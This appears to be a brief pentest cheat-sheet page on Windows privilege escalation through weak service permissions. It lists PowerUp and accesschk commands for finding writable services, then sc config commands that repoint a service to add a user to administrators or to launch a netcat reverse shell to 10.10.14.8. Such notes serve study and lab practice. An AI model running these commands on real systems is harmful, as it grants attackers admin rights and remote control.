Last updated 10 months ago
Was this helpful?
Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.
. .\PowerUp.ps1 Invoke-AllChecks
sc config daclsvc binpath= "net localgroup administrators Greg /add" sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"
sc start dacl
accesschk64.exe --accept-eula -uwcv Everyone *
accesschk64.exe -uwcv daclsvc
sc qc daclsvc